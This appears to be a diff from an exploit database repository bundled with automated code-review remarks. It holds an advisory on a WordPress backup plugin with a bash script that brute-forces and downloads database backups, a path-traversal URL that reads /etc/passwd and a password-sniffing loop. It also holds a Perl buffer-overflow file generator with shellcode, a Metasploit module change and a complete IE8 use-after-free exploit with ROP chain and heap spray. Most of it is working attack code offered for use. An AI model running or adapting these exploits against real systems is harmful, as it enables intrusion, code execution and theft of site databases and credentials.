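+1673 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/database-sql.sql");
+1674 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/htaccess.txt");
+1675 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/perm.txt");
+1695- if ($_REQUEST[cron_dbonly] != 1) {
+1696: exec($_CONFIG[tarpath] . " $excl_cmd " . " -X " . $_CONFIG['exfile_tar'] . " -chv" . $_CONFIG['tarcompress'] . "f $filename ./");
+1697- } else {
+1698-
+1699-
+1700: exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "cvf $filename ./administrator/backups/database-sql.sql");
+1701-
+1702- if (is_array($databases_incl)) {
+1703- foreach ($databases_incl as $database_name)
+1704- if ($database_name != "") {
+1705: exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/" . $database_name . "-sql.sql");
+1706- }
+1707- }
+1708- }
+--
+1873- {
+1874- //$sizeInBytes = filesize($path);
+1875- $sizeInBytes = sprintf("%u", filesize($path));
+1876: if ((!$sizeInBytes) and (function_exists("exec"))){
+1877- $command = "ls -l \"$path\" | cut -d \" \" -f 5";
+1878: $sizeInBytes = @exec($command);
+1879- }
+2010- if ($_CONFIG['sql_mem']) {
+2011: exec($_CONFIG[sqldump] . " -h " . $_CONFIG['mysql_host'] . " -u " . $_CONFIG['mysql_user'] . " -p" . $_CONFIG['mysql_pass'] . " " . $dbname . " > " . $sqlfile . " $drop --allow-k
+eywords " . $ex_dump);
+2012-
+2013- if (get_filesize($sqlfile) > 0)
+2014- $databaseResult = LM_DATABASE_BACKUP_COMPLETED . ' ( ' . getFileSizeText(get_filesize($sqlfile)) . ' )';
+2015- else
+2016- $databaseResult = LM_MSG_BACK_14;
+2017-
+2018: exec("chmod 777 $sqlfile");
+2019-
+2020- return $sqlfile;
+2021- }
+./classes/fileRecursion.php
+339- public static function getFileSize($file){
+340-
+341- $sizeInBytes = sprintf("%u", filesize($file));
+342: if ((!$sizeInBytes) and (function_exists("exec"))){
+343- $command = "ls -l \"$file\" | cut -d \" \" -f 5";
+344: $sizeInBytes = @exec($command);
+345- }
+346-
+347- return $sizeInBytes;
+./restore/XCloner.php
+290- }else{
+291- if($ext == '.tgz') $compress = 'z';
+292- else $compress = '';
+293: shell_exec("tar -x".$compress."pf $file -C $_CONFIG[output_path]");
+294- }
+295-}
+1077- if($_REQUEST['use_mysqldump'] == 1){
+1078: echo shell_exec($_REQUEST['mysqldump_path']." -u ".$_REQUEST[mysql_username]." -p".$_REQUEST[mysql_pass]." -h ".$_REQUEST[mysql_server]." ".$_REQUEST[mysql_db]." < ".$sqlfile);
+1079- return;
+1080- }
+Clear Text MySQL Database Password
+The plugin also returns the MySQL clear text password via html text box back to the user in the configuration panel. A password should never be repeated back to you in clear text. The plugin will happily send this over a clear text connection.
+Screenshots available at the advisory URL above.
+Remote Database Download & Local File Permissions
+The default recommend path for backup storage is /usr/share/wordpress/administrator/backups.
+An index.html file is created under this directory to prevent casual browsing however the file names are easily predictable. From the installation instructions:
+“XCloner is a tool that will help you manage your website backups, generate/restore/move so your website will be always secured! With XCloner you will be able to clone your site to any other location with just a few clicks. Don't forget to create the 'administrator/backups' directory in your Wordpress root and make it fully writeable.”
+The format of the filenames are: backup_year-month-day_month_24hour_minute_domainname-sql-OPTIONS.tar where
+OPTIONS could be either -sql-drop, -sql-nodrop or -nosql depending on options selected during time of backup.
+The domain name is set by the HTTP_HOST header from line 88 of cloner.config.php:
+88: $_CONFIG['mosConfig_live_site']=$_SERVER['HTTP_HOST'];
+root@larry:/usr/share/wordpress/administrator/backups# ls -l
+total 129432
+-rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:15 backup_2014-10-29_10-14_testsite-sql-nodrop.tar
+-rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:19 backup_2014-10-29_10-19_testsite-sql-nodrop.tar
+-rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:24 backup_2014-10-29_10-24_testsite-sql-nodrop.tar
+These file permissions also expose the contents of the databases to any local system users.
+File naming convention code is as follows:
+1327 $domainname = $_CONFIG['mosConfig_live_site'];
+1351 if ($_REQUEST['bname'] == "") {
+1352 if ($backupDatabase == 1) {
+1353 if ($_REQUEST['dbbackup_drop']) {
+1354 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-sql-drop' . $f_ext;
+1355 } else {
+1356
+1357 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-sql-nodrop' . $f_ext;
+1358 }
+1359 } else
+1360 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-nosql' . $f_ext;
+1361 } else {
+Screenshots available at the advisory URL above.
+Ive found a few vulnerable websites with the google dork:
+https://www.google.com/#q=inurl:+administrator%2Fbackups
+A PoC:
+lwc@wordpress:~$ bash exp.sh 192.168.0.26
+[+] Location http://192.168.0.26/administrator/backups/backup_2014-10-30_06-27_-sql-nodrop.tar Found
+[+] Received HTTP/1.1 200 OK
+Downloading......
+--2014-10-30 13:02:51-- http://192.168.0.26/administrator/backups/backup_2014-10-30_06-27_-sql-nodrop.tar
+Connecting to 192.168.0.26:80... connected.
+HTTP request sent, awaiting response... 200 OK
+Length: 44400640 (42M) [application/x-tar]
+Saving to: `backup_2014-10-30_06-27_-sql-nodrop.tar.1'
+100%[========================================>] 44,400,640 56.9M/s in 0.7s
+2014-10-30 13:02:52 (56.9 MB/s) - `backup_2014-10-30_06-27_-sql-nodrop.tar.1' saved [44400640/44400640]
+[+] Location http://192.168.0.26/administrator/backups/backup_2014-10-30_06-33_-sql-nodrop.tar Found
+[+] Received HTTP/1.1 200 OK
+Downloading......
+--2014-10-30 13:02:52-- http://192.168.0.26/administrator/backups/backup_2014-10-30_06-33_-sql-nodrop.tar
+Connecting to 192.168.0.26:80... connected.
+HTTP request sent, awaiting response... 200 OK
+Length: 44400640 (42M) [application/x-tar]
+Saving to: `backup_2014-10-30_06-33_-sql-nodrop.tar.1'
+100%[========================================>] 44,400,640 64.1M/s in 0.7s
+2014-10-30 13:02:53 (64.1 MB/s) - `backup_2014-10-30_06-33_-sql-nodrop.tar.1' saved [44400640/44400640]
+#!/bin/bash
+#Exploit to download XCloner v3.1.1 Database backups OSVDB: 114177
+#Larry W. Cashdollar, @_larry0
+#XCloner recommends a backup storage path under the WP root directory
+#it uses a 0 size index.html file to block indexing.
+#we can try to brute force the filenames it creates.
+MONTH=10
+DAY=30
+#May need to set the DOMAIN to $1 the target depending on how WP is configured.
+DOMAIN=
+for y in `seq -w 1 24`; do
+for x in `seq -w 1 59`; do
+CPATH="http://$1/administrator/backups/backup_2014-"$MONTH"-"$DAY"_"$y"-"$x"_$DOMAIN-sql-nodrop.tar";
+RESULT=`curl -s --head $CPATH|grep 200`;
+if [ -n "$RESULT" ]; then
+echo "[+] Location $CPATH Found";
+echo "[+] Received $RESULT";
+echo "Downloading......";
+wget $CPATH
+fi;
+done
+done
+Remote File Access
+The user has to have administrative rights, but the backup downloader doesnt check the path
+for ../.
+http://192.168.0.33/wp-admin/admin-ajax.php?action=json_return&page=xcloner_show&option=com_cloner&task=download&file=../../../../etc/passwd
+Will download /etc/passwd off the remote system.
+MySQL Database Password Exposed to Process Table
+Local users can steal the MySQL password by watching the process table:
+lwc@wordpress:/etc/wordpress$ while (true); do ps -ef |grep [m]ysqldump; done
+www-data 16691 8889 0 09:27 ? 00:00:00 sh -c mysqldump --quote-names -h localhost -u root -pPASSWORDHERE wordpress > /usr/share/wordpress/administrator/backups/database-sql.sql --allow-keywords
+www-data 16692 16691 0 09:27 ? 00:00:00 mysqldump --quote-names -h localhost -u root -px xxxxxx wordpress --allow-keywords
+www-data 16691 8889 0 09:27 ? 00:00:00 sh -c mysqldump --quote-names -h localhost -u root -ps3cur1ty wordpress > /usr/share/wordpress/administrator/backups/database-sql.sql --allow-keywords
+www-data 16692 16691 0 09:27 ? 00:00:00 mysqldump --quote-names -h localhost -u root -px xxxxxx wordpress --allow-keywords
+^C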

60
platforms/windows/dos/35105.pl Executable file

@ -0,0 +1,60 @@
#EDB Note: DoS - b0f isn't working.
# Title : Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) Buffer Overflow
# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home : http://milw00rm.com / its online
# Date : 28.10.2014
# Python : V 2.7
# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
my $file = "exploit.wax"; #dont change file name if change file name you must change $filepath
my $junk = "\x41" x 43516;
my $eip = "\xC3\x9c\xC8\x75"; #75C89CC3 JMP ESP | bad char: \x09\x0a
my $oyala = "\x90" x 100;
#tested on my windows 7 ultimate for file name "exploit.wax" if its not true path your windows you can change it for you
my $filepath = "\x01\x00\x00\x00\x00\x00\x00\x00". # .......
"\xCA\x84\xB2\x75\x4C\x00\x31\x00". # Ê„²uD.2.
"\x22\x00\x00\x00\x43\x3A\x5C\x55". # "...C:\U
"\x73\x65\x72\x73\x5C\x61\x64\x6D". # sers\adm
"\x69\x6E\x5C\x44\x65\x73\x6B\x74". # in\Deskt
"\x6F\x70\x5C\x65\x78\x70\x6C\x6F". # op\explo
"\x69\x74\x2E\x77\x61\x78\x00\x00"; # it.wax..
#msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | ruby msfencode -e x86/alpha_upper -t c
my $shellcode = "\x89\xe5\xd9\xc2\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43".
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34".
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41".
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58".
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4b\x39\x43\x30".
"\x45\x50\x43\x30\x45\x30\x4c\x49\x5a\x45\x56\x51\x49\x42\x52".
"\x44\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x51\x42\x54\x4c\x4c\x4b".
"\x56\x32\x54\x54\x4c\x4b\x52\x52\x56\x48\x54\x4f\x4f\x47\x50".
"\x4a\x56\x46\x56\x51\x4b\x4f\x56\x51\x49\x50\x4e\x4c\x47\x4c".
"\x43\x51\x43\x4c\x54\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54".
"\x4d\x43\x31\x49\x57\x4b\x52\x4c\x30\x56\x32\x50\x57\x4c\x4b".
"\x56\x32\x52\x30\x4c\x4b\x51\x52\x47\x4c\x43\x31\x58\x50\x4c".
"\x4b\x51\x50\x43\x48\x4b\x35\x4f\x30\x54\x34\x51\x5a\x43\x31".
"\x4e\x30\x56\x30\x4c\x4b\x51\x58\x45\x48\x4c\x4b\x56\x38\x47".
"\x50\x43\x31\x49\x43\x5a\x43\x47\x4c\x47\x39\x4c\x4b\x56\x54".
"\x4c\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e".
"\x4c\x4f\x31\x58\x4f\x54\x4d\x45\x51\x58\x47\x50\x38\x4d\x30".
"\x54\x35\x4c\x34\x45\x53\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x51".
"\x34\x52\x55\x4d\x32\x50\x58\x4c\x4b\x50\x58\x51\x34\x45\x51".
"\x49\x43\x52\x46\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45".
"\x4c\x43\x31\x4e\x33\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x58\x50".
"\x4d\x59\x50\x44\x47\x54\x51\x34\x51\x4b\x51\x4b\x45\x31\x56".
"\x39\x50\x5a\x56\x31\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x50\x5a".
"\x4c\x4b\x45\x42\x5a\x4b\x4d\x56\x51\x4d\x52\x4a\x45\x51\x4c".
"\x4d\x4b\x35\x4f\x49\x43\x30\x45\x50\x43\x30\x56\x30\x45\x38".
"\x56\x51\x4c\x4b\x52\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f\x4b\x4b".
"\x4e\x54\x4e\x50\x32\x5a\x4a\x45\x38\x49\x36\x4d\x45\x4f\x4d".
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x45\x56\x43\x4c\x45\x5a\x4d".
"\x50\x4b\x4b\x4b\x50\x54\x35\x54\x45\x4f\x4b\x50\x47\x54\x53".
"\x52\x52\x52\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x49\x45\x43".
"\x53\x45\x31\x52\x4c\x43\x53\x56\x4e\x45\x35\x54\x38\x45\x35".
"\x45\x50\x41\x41";
open ($FILE, ">$file");
print $FILE "$junk.$eip.$oyala.$shellcode.$filepath";
close ($FILE);
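Review bot: `open ($FILE, ">$file");` on the second-to-last line uses the two-argument open on an undeclared global filehandle and never checks the result, so a failure to create the output file passes silently and the following `print` writes nowhere. The conventional form is `open(my $fh, '>', $file) or die "cannot open $file: $!";` followed by `print $fh ...` and `close($fh)`. Adding `use strict; use warnings;` at the top would catch this class of mistake, and every other variable in the file is already declared with `my`. The header comment `# Python : V 2.7` does not match the file, which is Perl.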


@ -32,7 +32,8 @@ class Metasploit3 < Msf::Exploit::Local
[ [
'Unknown', # vulnerability discovery and exploit in the wild 'Unknown', # vulnerability discovery and exploit in the wild
'juan vazquez', # msf module (x86 target) 'juan vazquez', # msf module (x86 target)
'Spencer McIntyre' # msf module (x64 target) 'Spencer McIntyre', # msf module (x64 target)
'OJ Reeves <oj[at]buffered.io>'
], ],
'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'Platform' => 'win', 'Platform' => 'win',
@ -93,11 +94,7 @@ class Metasploit3 < Msf::Exploit::Local
return Exploit::CheckCode::Safe if build == 9200 return Exploit::CheckCode::Safe if build == 9200
return Exploit::CheckCode::Safe if build == 9600 return Exploit::CheckCode::Safe if build == 9600
if arch == ARCH_X86 return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
else
return Exploit::CheckCode::Detected if build == 7601
end
return Exploit::CheckCode::Unknown return Exploit::CheckCode::Unknown
end end
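Review bot: The collapsed condition in the second hunk now returns `Exploit::CheckCode::Detected` for builds 2600, 3790 and 7600 on x64 as well, where the removed branch accepted only 7601 for that arch; if the x64 target was not extended to those builds elsewhere in this commit, `check` will over-report. If dropping the arch gate is intentional, a short comment above the line, e.g. `# both the x86 and x64 targets cover these builds`, would record that so a later reader does not reintroduce the branch. The enclosing `check` method starts outside the hunk.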


@ -0,0 +1,149 @@
<!--
Exploit Title: MS14-035 Use-after-free Exploit for IE8
Date: 10 Nov 2014
Exploit Author: Ayman Sagy <aymansagy@gmail.com> https://www.linkedin.com/in/aymansagy
Tested on: IE8 with Java6 on Windows7
-->
<html>
<head><title>MS14-035 IE8 Use-after-free Exploit</title></head>
<body>
<!--
<APPLET id="dummy" code="dummy.class" width=100 height=100>
You need to install Java to view this page.
</APPLET>
-->
<div id="mydiv">x</div>
<form id="frm"></form>
<div id="sprayfrm"></div>
<script type="text/javascript">
spraysize = 5000;
sprayelement = document.getElementById("sprayfrm");
sprayelement.style.cssText = "display:none";
var data;
offset = 0x506;
buffer = unescape("%u2020%u2020");
pivot = unescape("%u8b05%u7c34"); // stack pivot
// MSVCR71
rop = unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret;
rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2}
rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect
rop += unescape("%u5645%u7c36"); // pop esi;ret;
rop += unescape("%u5243%u7c34"); // ret;
rop += unescape("%u8f46%u7c34"); // pop ebp;ret;
rop += unescape("%u87ec%u7c34"); // call eax;
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%ufdff%uffff"); // {size}
rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size}
rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx}
rop += unescape("%u39fa%u7c34"); // pop edx;ret;
rop += unescape("%uffc0%uffff"); // {flag}
rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag}
rop += unescape("%u4648%u7c35"); // pop edi;ret;
rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret;
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment}
rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret;
rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret;
rop += unescape("%u683f%u7c36"); // push esp;ret;
rop += unescape("%ubc90%u1010%u1010"); // NOP / MOV ESP,0x10101010
// calc
shellcode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u16ba%u3d14%uddf0%ud9c2%u2474%u5ff4%uc929%u32b1%u5731%u0312%u1257%uf983%udfe8%uf905%ua9f9%u01e6%uc9fa%ue46f%udbcb%u6d14%uec79%u235f%u8772%ud732%ue501%ud89a%u40a2%ud7fd%u6533%ubbc1%ue7f0%uc1bd%uc824%u0afc%u0939%u7638%u5bb2%ufd91%u4c61%u4396%u6dba%uc878%u1582%u0efd%uac76%u5efc%ubb27%u46b7%ue343%u7767%uf780%u3e54%uccad%uc12f%u1d67%uf0cf%uf247%u3dee%u0a4a%uf936%u79b5%ufa4c%u7a48%u8197%u0f96%u210a%ub75c%ud0ee%u2eb1%ude64%u247e%uc222%ue981%ufe58%u0c0a%u778f%u2b48%udc0b%u520a%ub80a%u6bfd%u644c%uc9a1%u8606%u68b6%ucc45%uf849%ua9f3%u024a%u99fc%u3322%u7677%ucc34%u3352%u86ca%u15ff%u4f43%u246a%u700e%u6a40%uf337%u1261%uebcc%u1703%uab88%u65f8%u5981%udaff%u4ba2%ubd9c%u1730%u4163");
/*
_______0x1cc_____
| |
\|/ |
Junk ROP Shellcode Pivot Junk
2 3 1
*/
while (buffer.length < (offset - 0x1cc/2)) buffer += unescape("%u4cc2%u7c34");
buffer += rop;
buffer += shellcode;
while (buffer.length < offset) buffer += unescape("%u4cc2%u7c34");
while (buffer.length < 0x1000) buffer += buffer;
data = buffer.substring(0,offset) + pivot + rop + shellcode
data += buffer.substring(0,0x800-offset-rop.length-shellcode.length-pivot.length);
while (data.length < 0x80000) data += data;
for (var i = 0; i < 0x450; i++) // payload heap spray with corelanc0d3r's DEPS
{
var obj = document.createElement("button");
obj.title = data.substring(0,0x40000-0x58);
//obj.style.fontFamily = data.substring(0,0x40000-0x58);
sprayelement.appendChild(obj);
}
block = unescape( // Literal string to avoid heap allocation
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca");
blocks = new Array();
for (i = 0; i < spraysize; i++) { // spray 1
blocks.push(document.createElement("button"));
blocks[i].setAttribute("title",block.substring(0, block.length));
sprayelement.appendChild(blocks[i]);
}
for (i = spraysize/2; i < spraysize; i++) { // free some blocks
blocks[i].setAttribute("title","");
}
var newdiv = document.createElement('div');
newdiv.innerHTML = "<textarea id='CTextArea'>&lt;/textarea&gt;";
document.getElementById("frm").appendChild(newdiv);
var newdiv2 = document.createElement('div');
newdiv2.innerHTML = "<input id='CInput' type='checkbox' onpropertychange='crash()'></input>";
document.getElementById("frm").appendChild(newdiv2);
document.getElementById("CInput").checked = true;
trigger = true;
document.getElementById("frm").reset();
function crash() {
if (trigger) {
document.getElementById("frm").innerHTML = ""; // Free object, trigger bug
CollectGarbage();
for (i = spraysize/2; i < spraysize; i++) { // spray 2
blocks[i].setAttribute("title",block.substring(0, block.length));
}
}
}
</script>
</body>
</html>